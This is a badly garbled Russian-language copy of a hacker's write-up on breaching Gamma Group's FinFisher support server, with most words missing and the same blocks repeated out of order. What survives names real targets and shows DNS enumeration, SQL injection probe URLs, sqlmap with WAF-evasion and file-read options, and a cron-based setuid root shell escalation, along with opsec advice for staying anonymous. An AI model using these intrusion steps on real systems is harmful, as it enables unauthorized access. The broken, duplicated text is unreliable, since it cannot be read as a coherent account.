Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
